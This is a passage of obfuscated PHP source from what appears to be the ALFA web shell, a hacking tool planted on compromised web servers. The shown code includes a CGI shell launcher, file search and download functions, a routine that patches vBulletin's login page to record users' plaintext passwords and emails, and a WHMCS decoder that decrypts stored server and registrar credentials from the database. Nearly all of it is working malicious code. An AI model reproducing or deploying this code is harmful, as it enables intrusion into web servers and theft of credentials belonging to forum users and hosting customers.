"\x3c\143\x65\x6e\164\145\x72\76\x3c\x64\x69\166\x20\143\154\x61\x73\163\x3d\42\x74\x78\x74\x66\x6f\x6e\x74\x5f\150\x65\x61\144\x65\162\x22\76\x7c\40\106\151\156\x64\x20\106\x69\x6c\145\x73\40\102\x79\40\x4e\141\x6d\x65\x20\57\x20\106\x69\x6e\144\40\123\164\162\151\156\147\40\x49\x6e\x20\x46\x69\154\x65\163\40\174\74\57\144\x69\166\76\x3c\142\x72\76\74\142\162\76\x3c\146\x6f\x72\x6d\40\x6f\156\123\165\x62\155\151\x74\x3d\42\147\50\x27\x73\x65\141\162\143\x68\x65\162\x27\54\x6e\165\x6c\x6c\54\x27\x73\164\162\47\x2c\164\150\x69\x73\56\144\151\x72\x2e\166\141\154\165\145\x2c\x74\x68\x69\x73\x2e\x73\x74\x72\151\156\x67\x2e\166\141\x6c\x75\145\x2c\x27\76\76\x27\x2c\164\150\x69\x73\56\145\170\x74\x2e\166\x61\154\165\145\x2c\164\x68\x69\x73\x2e\x6d\145\x74\150\157\144\x2e\x76\x61\154\x75\145\x29\x3b\x72\x65\164\x75\162\x6e\x20\146\141\154\163\x65\x3b\42\40\x6d\145\164\x68\x6f\144\x3d\x27\160\157\x73\164\47\76\xa\74\144\x69\166\40\143\154\x61\x73\163\75\x22\x74\170\164\x66\x6f\x6e\x74\x22\x3e\xa\x4d\x65\x74\150\x6f\144\x3a\40\x3c\x73\145\x6c\145\143\164\x20\156\x61\155\145\75\42\155\145\164\150\157\x64\x22\x3e\x3c\157\160\164\151\157\156\x20\x76\141\154\x75\x65\x3d\x22\156\x61\155\145\42\x3e\106\x69\x6e\x64\40\106\x69\154\145\x73\x20\102\x79\x20\x4e\141\x6d\x65\x3c\57\x6f\160\164\151\157\156\76\74\x6f\160\x74\x69\x6f\156\x20\x76\x61\154\x75\145\75\42\163\164\162\42\76\106\151\156\x64\x20\x53\x74\x72\x69\156\147\40\111\156\x20\x46\151\154\x65\x73\x3c\x2f\157\160\x74\151\x6f\x6e\76\74\57\163\145\154\145\x63\x74\x3e\12\x53\x74\x72\151\156\x67\72\40\x3c\151\156\x70\165\x74\x20\164\171\x70\145\x3d\42\164\145\170\x74\x22\x20\x6e\x61\x6d\145\x3d\x22\x73\x74\x72\x69\x6e\147\42\x20\x76\141\154\x75\145\75\x22\x22\x3e\xa\x44\x69\162\72\x20\x3c\151\x6e\x70\165\164\x20\163\x69\x7a\x65\75\x22\x35\x30\42\40\164\x79\x70\x65\75\42\x74\x65\x78\x74\x22\40\156\141\x6d\145\75\x22\144\151\x72\42\40\x76\x61\154\165\145\x3d\42" . $GLOBALS["\x63\167\x64"] . "\42\x3e\12\x45\x78\x74\x3a\40\x3c\163\155\x61\154\x6c\x3e\x3c\146\157\156\x74\40\x63\157\154\x6f\162\x3d\42\162\x65\144\x22\76\133\x20\52\40\x3d\x20\141\154\154\40\x45\170\x74\x20\x5d\74\57\146\157\x6e\164\x3e\74\x2f\x73\155\141\x6c\154\76\40\74\151\x6e\x70\x75\x74\40\151\x64\75\x22\145\x78\x74\42\x20\x73\164\171\154\145\x3d\42\x74\145\170\164\x2d\x61\154\x69\147\x6e\x3a\143\x65\x6e\164\x65\162\73\x22\x20\164\171\160\145\75\x22\x74\145\170\164\x22\40\156\x61\x6d\145\75\x22\x65\170\164\42\40\163\151\172\145\x3d\42\65\x22\40\166\x61\154\165\145\x3d\42\160\x68\160\x22\x3e\12\x3c\151\156\x70\x75\x74\x20\164\x79\160\x65\75\42\x73\165\142\x6d\x69\x74\42\x20\x6e\x61\155\x65\75\x22\142\164\x6e\42\40\166\141\154\165\x65\75\x22\40\x22\x3e\x3c\57\144\151\166\76\x3c\57\x66\157\x72\155\x3e\74\57\x63\145\156\164\145\162\76\x3c\142\x72\76"; $dir = $_POST["\141\x6c\146\x61\62"]; $string = $_POST["\x61\154\146\141\63"]; $ext = $_POST["\x61\x6c\146\141\65"]; if (!empty($string) and !empty($dir) and $_POST["\141\x6c\146\x61\x34"] == "\76\x3e") { echo __pre(); Alfa_StrSearcher($dir, $string, $ext, $_POST["\x61\x6c\x66\141\x36"]); } } echo "\74\x2f\x64\x69\166\76"; alfafooter(); } goto K8RV4; rihre: function alfaPermsColor($f, $isbash = false) { $class = ''; $num = ''; $human = ''; if ($isbash) { $class = $f["\143\154\x61\163\163"]; $num = $f["\x6e\165\x6d"]; $human = $f["\x68\x75\x6d\x61\156"]; } else { $num = substr(sprintf("\45\x6f", @fileperms($f)), -4); $human = alfaPerms(@fileperms($f)); if (!@is_readable($f)) { $class = "\x6d\141\x69\156\137\162\145\144\x5f\x70\145\162\155"; } elseif (!@is_writable($f)) { $class = "\x6d\141\x69\156\x5f\x77\x68\x69\164\145\137\160\145\162\155"; } else { $class = "\x6d\x61\x69\156\137\x67\162\x65\145\156\137\x70\145\162\x6d"; } } return "\x3c\x73\160\x61\156\40\x73\x74\x79\154\x65\x3d\x22\146\157\x6e\x74\x2d\167\x65\151\x67\x68\164\x3a\x75\156\x73\x65\x74\73\42\40\x63\x6c\141\163\x73\x3d\42" . $class . "\42\76" . $num . "\74\x2f\163\160\x61\156\x3e\x3c\x73\160\141\x6e\40\163\164\171\154\145\x3d\x22\x66\157\x6e\x74\x2d\x77\x65\x69\147\150\164\x3a\x75\156\163\145\164\73\42\40\x63\154\x61\163\163\x3d\x22\x62\x65\x65\164\x77\x65\145\156\137\x70\x65\x72\155\163\x22\76\40\76\x3e\x20\74\57\x73\160\141\156\x3e\x3c\163\x70\x61\x6e\40\x73\164\171\154\145\75\x22\x66\157\x6e\x74\x2d\x77\x65\151\147\150\164\72\165\156\163\145\164\73\42\x20\x63\154\x61\x73\x73\x3d\x22" . $class . "\x22\76" . $human . "\x3c\57\x73\x70\141\156\76"; } goto DIhO_; q3RIR: function _alfa_file($file, $cgi = true) { $array = @file($file); if (!$array) { if (strlen(alfaEx("\x69\144", false, $cgi)) > 0) { $data = alfaEx("\x63\x61\x74\x20\42" . addslashes($file) . "\x22", false, $cgi); if (strlen($data) > 0) { return explode("\xa", $data); } else { return false; } } else { return false; } } else { return $array; } } goto IGhSm; hVRBs: function output($string) { echo "\74\x62\x72\x3e\74\160\162\x65\x20\151\x64\x3d\x22\163\x74\x72\x4f\165\164\x70\x75\x74\x22\40\x73\x74\x79\x6c\x65\75\x22\155\141\162\x67\151\156\x2d\x74\x6f\x70\72\x35\160\x78\42\40\143\154\x61\x73\x73\x3d\42\155\154\61\x22\76\x3c\142\x72\x3e\x3c\x63\x65\x6e\x74\x65\162\76\74\x66\157\156\x74\40\143\x6f\154\157\162\x3d\162\145\x64\76\x3c\x61\40\164\141\162\147\x65\x74\x3d\47\137\142\154\141\156\x6b\x27\40\x68\x72\145\x66\75\47" . $string . "\x27\76\103\154\151\x63\153\40\110\x65\162\x65\40\x21\74\57\x61\76\x3c\x2f\146\157\x6e\164\76\74\57\142\76\x3c\x2f\143\x65\x6e\164\x65\162\76\74\x62\162\76\74\142\x72\76"; } goto Hq5LP; K84I1: function hijackvBulletin($path, $saveto) { $code = "\x24\141\154\146\141\137\165\163\x65\x72\x6e\x61\x6d\145\x20\75\40\163\164\162\164\157\154\x6f\167\x65\162\50\x24\166\142\x75\154\x6c\145\x74\x69\156\55\x3e\107\120\x43\133\42\x76\142\x5f\154\x6f\x67\151\x6e\x5f\165\x73\x65\x72\156\141\x6d\145\42\x5d\51\73\44\141\x6c\x66\141\137\x70\141\163\163\167\157\162\144\40\x3d\x20\x24\166\x62\165\154\x6c\145\x74\x69\x6e\55\x3e\x47\120\x43\133\42\x76\x62\137\x6c\x6f\147\x69\x6e\x5f\x70\x61\163\163\167\x6f\162\x64\x22\135\x3b\44\141\154\146\141\x5f\x66\151\154\x65\40\x3d\x20\42\x7b\x73\x61\166\145\164\157\137\160\x61\x74\x68\x7d\42\x3b\x24\163\x71\x6c\137\161\165\145\x72\171\x20\75\x20\x24\166\142\165\154\x6c\145\164\x69\156\x2d\x3e\144\142\x2d\76\x71\x75\x65\162\x79\137\x72\x65\x61\144\50\42\123\x45\114\105\x43\124\x20\x2a\40\106\x52\117\x4d\x20\x22\40\x2e\40\124\101\x42\x4c\x45\137\120\x52\105\x46\111\130\40\56\x20\x22\x75\x73\x65\x72\40\x57\x48\x45\122\105\x20\x60\x75\x73\145\x72\x6e\141\x6d\145\140\75\x27\x22\40\56\x20\x24\x61\154\146\x61\137\x75\163\145\162\156\141\x6d\x65\40\56\40\x22\47\x22\51\73\167\150\151\154\145\50\x24\x72\x6f\x77\x20\x3d\40\44\166\142\x75\x6c\x6c\145\164\151\x6e\55\x3e\144\142\x2d\x3e\x66\x65\x74\x63\x68\x5f\x61\162\x72\141\171\x28\x24\x73\x71\154\137\x71\x75\x65\x72\x79\x29\51\173\151\146\50\x73\164\162\154\x65\x6e\x28\44\141\x6c\146\141\137\160\x61\163\x73\167\x6f\x72\144\x29\x20\76\40\x31\x20\x41\116\104\40\163\164\162\154\x65\156\50\x24\141\x6c\x66\141\x5f\x75\x73\145\162\156\x61\155\145\x29\x20\76\x20\x31\x29\173\44\x66\x70\x31\x20\x3d\x20\x40\146\157\160\x65\156\x28\44\141\154\x66\141\x5f\146\151\x6c\145\54\40\x22\141\x2b\42\51\x3b\x40\146\x77\x72\x69\164\x65\50\44\x66\160\61\x2c\x20\x24\x61\154\146\141\137\x75\x73\x65\162\x6e\141\155\x65\40\x2e\40\47\x20\72\x20\x27\x20\x2e\x20\x20\44\141\154\x66\x61\137\160\141\163\163\167\157\162\x64\56\x22\40\50\x22\x20\56\x20\44\x72\x6f\x77\x5b\42\x65\155\x61\151\x6c\x22\x5d\40\x2e\40\42\x29\134\x6e\42\x29\x3b\x40\146\x63\154\157\163\x65\50\x24\146\x70\x31\x29\x3b\x20\44\146\x20\x3d\x20\100\x66\x69\x6c\x65\50\x24\x61\154\146\141\x5f\x66\x69\x6c\x65\51\73\44\x6e\145\x77\x20\75\x20\141\x72\x72\x61\x79\x5f\165\x6e\151\x71\x75\145\50\44\146\51\73\x24\146\x70\x20\75\x20\100\146\157\x70\145\x6e\x28\44\x61\154\146\x61\137\146\x69\x6c\x65\54\40\42\x77\42\51\73\x66\157\162\x65\x61\143\x68\50\x24\x6e\x65\167\40\x61\163\x20\x24\166\x61\154\165\x65\163\x29\x7b\100\146\x70\x75\x74\163\x28\44\146\160\x2c\40\44\166\x61\x6c\165\145\163\x29\73\x7d\x40\x66\143\x6c\x6f\163\145\x28\44\x66\160\x29\x3b\175\x7d"; $clearpw = "\x64\145\146\x69\156\x65\144\50\47\104\x49\123\x41\x42\x4c\x45\x5f\x50\x41\123\123\127\x4f\x52\104\x5f\103\114\105\x41\122\x49\x4e\x47\x27\51"; $code = str_replace("\173\x73\141\x76\145\164\x6f\137\160\141\x74\x68\175", $saveto, $code); $login = $path . "\57\154\x6f\x67\151\x6e\56\160\150\x70"; $class = $path . "\x2f\151\156\x63\154\x75\x64\x65\x73\57\x63\x6c\141\x73\x73\x5f\x62\x6f\157\164\x73\x74\x72\141\x70\56\x70\x68\x70"; $dologin = "\144\x6f\137\154\x6f\x67\151\x6e\137\162\145\144\x69\x72\x65\x63\164\50\51\73"; $evil_login = "\x9" . $code . "\xa\x9" . $dologin; $evil_class = "\164\162\165\x65"; if ((@is_file($login) and @is_writable($login)) || (@is_file($class) and @is_writable($class))) { $data_login = @file_get_contents($login); $data_class = @file_get_contents($class); if (strstr($data_login, $dologin) || strstr($data_class, $clearpw)) { $login_replace = str_replace($dologin, $evil_login, $data_login); $class_replace = str_replace($clearpw, $evil_class, $data_class); @file_put_contents($login, $login_replace); @file_put_contents($class, $class_replace); hijackOutput(0, $saveto); } else { hijackOutput(1); } } else { hijackOutput(1); } } goto L1kU5; xyjRH: function __ZGVjb2Rlcg($s) { return zRtSHsbTzV($s); } goto K5MFn; JSX0M: function alfaWhmcs() { alfahead(); echo "\x3c\x64\x69\x76\40\x63\x6c\141\163\x73\75\x68\145\x61\x64\145\x72\76"; function decrypt($string, $cc_encryption_hash) { $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash); $hash_key = _hash($key); $hash_length = strlen($hash_key); $string = __ZGVjb2Rlcg($string); $tmp_iv = substr($string, 0, $hash_length); $string = substr($string, $hash_length, strlen($string) - $hash_length); $iv = $out = ''; $c = 0; while ($c < $hash_length) { $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c])); ++$c; } $key = $iv; $c = 0; while ($c < strlen($string)) { if ($c != 0 and $c % $hash_length == 0) { $key = _hash($key . substr($out, $c - $hash_length, $hash_length)); } $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c])); ++$c; } return $out; } function _hash($string) { if (function_exists("\x73\x68\141\61")) { $hash = sha1($string); } else { $hash = md5($string); } $out = ''; $c = 0; while ($c < strlen($hash)) { $out .= chr(hexdec($hash[$c] . $hash[$c + 1])); $c += 2; } return $out; } AlfaNum(8, 9, 10); echo "\74\143\x65\156\164\x65\162\76\74\142\162\x3e\74\x64\151\166\40\x63\154\x61\x73\x73\x3d\47\x74\170\x74\146\x6f\156\164\137\x68\x65\x61\144\x65\x72\47\x3e\174\40\127\x48\115\103\x53\x20\104\x65\103\x6f\x64\x65\162\40\174\74\57\144\151\166\x3e\74\x70\x3e" . getConfigHtml("\167\x68\155\x63\163") . "\74\57\x70\76\74\146\157\162\x6d\40\x6f\x6e\x73\x75\142\x6d\x69\x74\75\42\147\x28\x27\127\x68\x6d\x63\163\x27\x2c\x6e\165\154\x6c\54\164\150\151\163\56\x66\x6f\x72\x6d\x5f\141\x63\164\151\x6f\156\56\x76\141\154\x75\x65\x2c\x27\x64\x65\143\x6f\x64\145\162\47\54\164\150\x69\x73\56\x64\x62\x5f\x75\x73\x65\162\x6e\141\x6d\145\56\166\x61\154\165\x65\x2c\164\150\151\163\56\144\x62\x5f\160\141\x73\x73\167\157\x72\x64\x2e\x76\x61\x6c\165\145\x2c\164\150\x69\x73\56\144\142\137\156\x61\155\145\56\x76\x61\x6c\x75\145\54\x74\150\151\x73\x2e\x63\x63\137\x65\x6e\143\162\171\160\x74\x69\157\x6e\137\x68\x61\163\150\56\166\x61\154\165\145\x2c\164\150\x69\x73\x2e\x64\142\x5f\x68\x6f\163\164\56\x76\141\x6c\x75\x65\51\x3b\x20\162\x65\164\165\162\x6e\x20\146\x61\154\x73\x65\x3b\42\76\12\74\x69\x6e\x70\x75\164\40\x74\171\160\x65\75\47\150\x69\144\x64\x65\156\47\40\156\x61\x6d\x65\x3d\47\x66\157\162\155\x5f\x61\143\164\x69\x6f\156\x27\x20\x76\x61\154\165\x65\75\x27\62\47\x3e"; $table = array("\x74\x64\61" => array("\x63\157\x6c\x6f\x72" => "\106\106\106\106\106\106", "\x74\x64\116\x61\x6d\x65" => "\x64\142\x5f\150\157\163\164\40\x3a\x20", "\x69\156\x70\x75\164\116\x61\x6d\x65" => "\x64\x62\x5f\x68\157\163\164", "\151\144" => "\144\x62\137\150\x6f\163\164", "\151\x6e\x70\x75\x74\x56\141\x6c\165\x65" => "\154\157\x63\x61\x6c\x68\157\163\164", "\x69\x6e\160\x75\164\123\x69\x7a\x65" => "\x35\60"), "\x74\x64\x32" => array("\x63\157\154\157\x72" => "\x46\x46\x46\106\x46\x46", "\x74\144\116\141\155\x65" => "\x64\x62\137\165\x73\145\x72\x6e\x61\155\x65\x20\x3a\x20", "\x69\x6e\160\165\164\116\141\x6d\x65" => "\144\142\x5f\165\163\145\x72\156\141\155\145", "\x69\144" => "\x64\x62\137\165\163\x65\162", "\151\x6e\160\165\x74\x56\141\x6c\165\x65" => '', "\x69\156\x70\165\164\123\x69\172\x65" => "\x35\x30"), "\x74\x64\x33" => array("\143\x6f\x6c\157\162" => "\x46\x46\106\x46\106\x46", "\x74\x64\116\x61\x6d\145" => "\x64\x62\x5f\160\x61\x73\x73\167\x6f\162\x64\40\72\x20", "\x69\156\160\165\x74\x4e\141\155\x65" => "\144\142\137\160\x61\x73\x73\x77\x6f\162\144", "\151\144" => "\x64\142\x5f\x70\167", "\x69\156\x70\x75\x74\126\141\154\165\x65" => '', "\x69\x6e\160\x75\x74\123\x69\172\x65" => "\65\60"), "\164\144\64" => array("\x63\x6f\154\157\162" => "\106\106\106\106\x46\x46", "\164\x64\116\x61\x6d\145" => "\x64\142\137\x6e\x61\x6d\x65\40\x3a\40", "\151\156\x70\165\164\x4e\x61\155\145" => "\x64\142\x5f\x6e\x61\x6d\x65", "\151\x64" => "\x64\142\137\x6e\141\155\145", "\x69\156\160\x75\x74\x56\141\154\x75\x65" => '', "\151\156\160\x75\164\x53\x69\172\145" => "\x35\60"), "\x74\144\x35" => array("\143\x6f\154\x6f\x72" => "\106\106\106\106\x46\106", "\x74\x64\x4e\141\x6d\145" => "\x63\143\x5f\x65\156\143\162\x79\160\x74\x69\x6f\x6e\137\x68\x61\163\150\40\72\x20", "\151\x6e\160\x75\x74\x4e\141\155\x65" => "\143\143\x5f\x65\x6e\143\x72\x79\160\164\x69\157\156\137\x68\x61\x73\x68", "\x69\144" => "\143\x63\x5f\145\156\143\162\171\160\x74\151\157\x6e\137\150\x61\163\x68", "\x69\x6e\x70\x75\164\126\141\154\x75\145" => '', "\x69\x6e\160\165\x74\x53\x69\172\x65" => "\x35\x30")); create_table($table); echo "\x3c\160\x3e\x3c\x69\156\x70\x75\164\x20\x74\x79\160\145\x3d\x27\163\165\x62\x6d\151\164\47\40\x76\141\x6c\x75\145\x3d\47\40\x27\40\x6e\141\155\145\x3d\x27\123\165\x62\155\x69\x74\47\x3e\x3c\x2f\x70\76\x3c\57\146\x6f\162\x6d\76\x3c\57\x63\x65\x6e\164\145\162\x3e"; if ($_POST["\141\154\146\x61\65"] != '') { $db_host = $_POST["\141\x6c\x66\141\67"]; $db_username = $_POST["\x61\x6c\146\141\63"]; $db_password = $_POST["\141\154\x66\141\x34"]; $db_name = $_POST["\141\154\x66\141\65"]; $cc_encryption_hash = $_POST["\x61\154\x66\x61\66"]; echo __pre(); $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn)); $query = mysqli_query($conn, "\123\x45\114\x45\103\x54\40\52\40\x46\x52\x4f\x4d\40\164\142\x6c\163\x65\x72\166\x65\162\163"); $num = mysqli_num_rows($query); if ($num > 0) { for ($i = 0; $i <= $num - 1; $i++) { $v = @mysqli_fetch_array($query); $ipaddress = $v["\151\x70\141\x64\x64\162\145\163\163"]; $username = $v["\x75\x73\x65\162\156\x61\x6d\x65"]; $type = $v["\x74\171\160\145"]; $active = $v["\x61\x63\164\x69\166\145"]; $hostname = $v["\150\x6f\163\164\156\141\x6d\145"]; echo "\x3c\x63\145\x6e\x74\x65\162\x3e\74\x74\141\142\154\x65\40\142\x6f\162\x64\145\162\x3d\x27\x31\x27\x3e"; $password = decrypt($v["\160\141\x73\x73\x77\157\162\x64"], $cc_encryption_hash); echo "\74\164\162\x3e\74\x74\x64\76\74\x62\x3e\x3c\146\x6f\156\x74\40\x63\157\x6c\x6f\x72\x3d\x22\x23\106\106\x46\106\106\x46\42\76\124\x79\160\x65\74\x2f\x66\157\x6e\164\x3e\74\x2f\x74\144\76\74\x74\144\76{$type}\x3c\57\164\x64\76\74\57\164\x72\x3e\74\57\142\x3e"; echo "\x3c\x74\162\76\74\x74\144\76\x3c\x62\x3e\x3c\146\157\x6e\164\x20\143\x6f\154\157\x72\75\x22\43\x46\106\106\x46\106\x46\42\x3e\101\x63\164\151\166\145\74\57\x66\x6f\x6e\x74\x3e\x3c\57\164\x64\76\x3c\x74\144\x3e{$active}\x3c\57\x74\144\76\74\x2f\x74\162\76\x3c\x2f\x62\x3e"; echo "\74\x74\162\x3e\x3c\164\x64\76\74\142\x3e\74\146\157\156\164\x20\143\157\154\x6f\162\x3d\42\43\106\106\106\106\x46\x46\42\76\110\157\163\164\x6e\141\x6d\145\x3c\57\x66\x6f\x6e\164\76\74\57\x74\x64\76\74\164\144\x3e{$hostname}\74\57\164\144\76\74\x2f\x74\162\76\x3c\x2f\142\76"; echo "\74\x74\x72\76\74\164\x64\76\x3c\x62\x3e\x3c\146\157\x6e\164\x20\143\x6f\154\x6f\162\x3d\42\43\x46\106\106\x46\x46\106\x22\76\111\x70\74\x2f\146\157\x6e\x74\x3e\x3c\x2f\x74\144\76\x3c\x74\x64\x3e{$ipaddress}\74\57\x74\x64\x3e\74\x2f\164\x72\x3e\74\57\x62\76"; echo "\x3c\x74\162\76\x3c\164\144\76\74\142\x3e\x3c\x66\157\156\x74\40\143\157\154\157\162\x3d\x22\x23\x46\x46\106\x46\106\x46\x22\x3e\x55\x73\x65\x72\x6e\x61\x6d\x65\x3c\57\x66\157\x6e\x74\76\74\x2f\x74\144\x3e\x3c\164\x64\x3e{$username}\x3c\57\164\144\76\74\57\164\x72\76\x3c\57\142\76"; echo "\x3c\x74\x72\x3e\74\164\144\76\x3c\x62\76\x3c\x66\x6f\x6e\x74\40\x63\x6f\154\x6f\162\75\42\x23\x46\x46\106\x46\x46\x46\42\76\x50\x61\x73\x73\167\x6f\x72\144\74\x2f\x66\157\x6e\x74\76\74\57\x74\x64\x3e\x3c\164\x64\76{$password}\74\x2f\x74\144\76\74\x2f\164\162\76\x3c\x2f\142\76"; echo "\x3c\57\164\141\x62\x6c\x65\76\74\142\x72\x3e\74\142\162\x3e\74\x2f\x63\145\x6e\x74\145\x72\x3e"; } $query1 = @mysqli_query($conn, "\123\x45\x4c\105\x43\x54\40\x2a\x20\x46\x52\117\x4d\x20\164\x62\x6c\162\145\x67\x69\163\x74\x72\141\162\x73"); $num1 = @mysqli_num_rows($query1); if ($num1 > 0) { for ($i = 0; $i <= $num1 - 1; $i++) { $v = mysqli_fetch_array($query1); $registrar = $v["\x72\145\147\151\163\x74\162\141\162"]; $setting = $v["\x73\145\x74\164\151\x6e\x67"]; $value = decrypt($v["\166\x61\x6c\165\145"], $cc_encryption_hash); if ($value == '') { $value = 0; } echo "\74\143\x65\156\164\145\x72\x3e\x44\x6f\155\141\x69\156\x20\x52\145\x73\x65\154\x6c\145\162\x20\x3c\x62\162\76\74\x63\145\156\x74\x65\x72\76"; echo "\x3c\143\145\x6e\x74\x65\x72\76\x3c\x74\x61\x62\154\x65\x20\142\157\x72\144\x65\x72\75\x27\x31\47\76"; echo "\74\x74\162\76\74\164\144\76\74\x62\76\74\146\157\x6e\164\x20\x63\x6f\x6c\x6f\162\75\42\43\x36\67\101\x42\104\106\42\76\x52\x65\x67\151\x73\164\x65\162\74\x2f\146\x6f\x6e\x74\76\x3c\57\x74\x64\x3e\x3c\x74\144\x3e{$registrar}\x3c\x2f\164\x64\x3e\x3c\x2f\164\x72\x3e\x3c\x2f\x62\76"; echo "\74\164\x72\x3e\x3c\164\144\76\x3c\142\x3e\x3c\x66\x6f\156\x74\x20\143\x6f\x6c\157\162\x3d\42\x23\x36\67\101\x42\104\x46\42\x3e\123\145\x74\x74\151\x6e\x67\x3c\57\146\157\x6e\x74\x3e\74\57\164\144\x3e\74\x74\144\x3e{$setting}\x3c\x2f\x74\144\x3e\74\x2f\164\162\76\x3c\57\x62\76"; echo "\74\164\x72\76\x3c\x74\x64\x3e\74\x62\76\74\146\157\x6e\x74\40\x63\157\x6c\157\162\x3d\42\43\66\x37\x41\x42\104\x46\42\76\x56\141\154\165\145\74\57\x66\157\156\x74\x3e\74\57\164\x64\x3e\74\164\144\76{$value}\74\57\x74\x64\76\x3c\57\x74\162\x3e\74\x2f\142\76"; echo "\74\57\x74\x61\142\x6c\145\x3e\x3c\x62\162\76\x3c\x62\162\76\x3c\57\143\145\156\164\x65\162\x3e"; } } } else { __alert("\74\x66\157\x6e\x74\40\x63\x6f\154\157\162\x3d\x22\162\145\144\x22\76\x74\142\154\163\x65\162\x76\x65\x72\163\x20\151\163\40\105\155\x70\164\171\56\x2e\56\x21\x3c\57\x66\x6f\x6e\x74\x3e"); } } echo "\74\57\144\x69\x76\76"; alfafooter(); } goto Qj51n; PRamH: $config = array("\x41\154\146\x61\x55\163\x65\x72" => $GLOBALS["\x44\102\137\116\101\115\x45"]["\165\x73\x65\x72"], "\x41\154\146\141\x50\x61\163\x73" => $GLOBALS["\x44\102\x5f\116\101\115\105"]["\x70\x61\x73\163"], "\101\154\x66\x61\120\162\x6f\x74\145\143\164\x53\x68\x65\154\x6c" => $GLOBALS["\104\x42\137\x4e\x41\x4d\x45"]["\163\x61\146\145\155\157\144\x65"], "\x41\x6c\x66\x61\114\x6f\147\151\x6e\x50\x61\147\145" => $GLOBALS["\104\102\137\x4e\101\115\105"]["\154\x6f\147\151\x6e\137\160\141\147\x65"]); goto F8Vk4; JM3pb: if (!function_exists("\x6d\x62\137\163\165\142\163\164\162")) { function mb_substr($str, $start, $end, $c = '') { return substr($str, $start, $end); } } goto xbej7; NkkuH: function alfadlfile() { if (isset($_POST["\143"], $_POST["\146\x69\154\x65"])) { $basename = rawurldecode(basename($_POST["\146\x69\x6c\145"])); $_POST["\146\151\154\145"] = str_replace("\57\x2f", "\x2f", $_POST["\143"] . "\x2f" . $basename); $alfa_canruncmd = _alfa_can_runCommand(true, true); if (@is_file($_POST["\x66\151\x6c\x65"]) && @is_readable($_POST["\146\151\154\x65"]) || $alfa_canruncmd) { ob_start("\157\142\x5f\x67\172\150\x61\x6e\x64\x6c\145\162", 4096); header("\103\157\x6e\x74\145\156\164\55\x44\151\x73\x70\x6f\163\x69\x74\x69\x6f\x6e\72\x20\x61\164\x74\x61\x63\150\155\145\x6e\164\73\40\x66\151\154\145\156\141\x6d\145\x3d\x22" . addslashes($basename) . "\42"); header("\103\157\156\x74\x65\156\x74\x2d\x54\171\x70\145\x3a\40\x61\x70\x70\x6c\x69\x63\x61\164\x69\x6f\156\57\157\x63\x74\x65\164\55\163\x74\x72\145\x61\x6d"); if ($GLOBALS["\147\x6c\x6f\142\x5f\x63\150\144\151\x72\x5f\146\x61\x6c\x73\145"]) { $randname = $basename . rand(111, 9999); $scriptpath = dirname($_SERVER["\123\x43\x52\111\120\x54\137\106\x49\x4c\105\x4e\x41\x4d\x45"]); $filepath = $scriptpath . "\57" . $randname; if (_alfa_is_writable($scriptpath)) { alfaEx("\143\x70\40\x27" . addslashes($_POST["\146\151\154\145"]) . "\47\x20\47" . addslashes($filepath) . "\47"); readfile($filepath); @unlink($filepath); } else { alfaEx("\143\x61\164\40\x27" . addslashes($_POST["\x66\x69\x6c\x65"]) . "\47"); } } else { readfile($_POST["\146\x69\x6c\145"]); } } else { echo "\105\162\162\x6f\x72\56\x2e\56\41"; } } } goto oMz56; GF8GE: define("\x5f\x5f\x41\x4c\x46\101\x5f\123\x45\x43\122\x45\124\137\113\x45\131\x5f\137", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : ''); goto n0FgV; bthgC: function alfacgishell() { alfahead(); $div = ''; alfaCreateParentFolder(); @chdir($GLOBALS["\150\x6f\x6d\x65\x5f\x63\167\x64"] . "\x2f" . __ALFA_DATA_FOLDER__); if (!in_array($_POST["\141\x6c\x66\x61\x31"], array("\160\x65\162\154", "\160\171"))) { $div = "\x3c\57\x64\151\166\x3e"; echo "\x3c\x64\151\x76\x20\x63\154\141\163\x73\75\x68\x65\x61\144\145\162\x3e\x3c\143\145\x6e\x74\145\x72\76\x3c\x70\76\74\x64\151\x76\40\143\x6c\141\163\x73\75\42\164\x78\164\x66\157\156\x74\137\x68\145\141\144\145\x72\42\76\174\x20\x43\x47\111\x20\123\x68\x65\x6c\154\x20\174\74\57\144\151\x76\76\74\x2f\x70\76\74\150\x33\76\74\x61\40\x63\x6c\141\x73\x73\x3d\x22\162\x65\152\145\x63\164\155\145\42\40\150\x72\145\x66\75\42\152\x61\166\x61\163\x63\162\x69\x70\164\72\x76\x6f\151\144\50\x30\51\x22\x20\157\x6e\143\154\151\x63\153\x3d\x22\x72\165\x6e\x63\147\x69\x28\x27\x70\x65\x72\x6c\47\51\x22\x3e\174\x20\120\145\162\x6c\x20\174\x20\x3c\57\141\x3e\x3c\141\x20\x63\154\141\163\x73\75\x22\162\x65\x6a\x65\x63\164\x6d\x65\x22\x20\150\x72\x65\146\x3d\42\152\x61\x76\x61\163\143\162\x69\x70\164\x3a\166\157\151\x64\x28\60\51\42\40\157\x6e\143\x6c\151\143\153\75\x22\162\x75\156\143\x67\x69\x28\x27\x70\171\x27\x29\x3b\x22\x3e\x7c\40\120\171\x74\150\157\156\x20\174\40\x3c\57\x61\x3e"; } if (isset($_POST["\141\x6c\x66\141\x31"]) && in_array($_POST["\141\x6c\x66\x61\x31"], array("\x70\145\x72\x6c", "\x70\x79"))) { @mkdir("\x63\147\151\x61\x6c\x66\x61", 493); @chdir("\x63\147\x69\x61\154\x66\x61"); alfacgihtaccess("\x63\x67\151"); $name = $_POST["\141\154\146\141\x31"] . "\56\x61\154\x66\141"; $perl = "\x23\41\x2f\x75\x73\x72\x2f\142\x69\156\x2f\x70\x65\162\x6c\40\x20\40\55\x49\x2f\x75\163\162\x2f\154\x6f\x63\141\154\57\142\141\156\144\x6d\151\156" . "\12" . 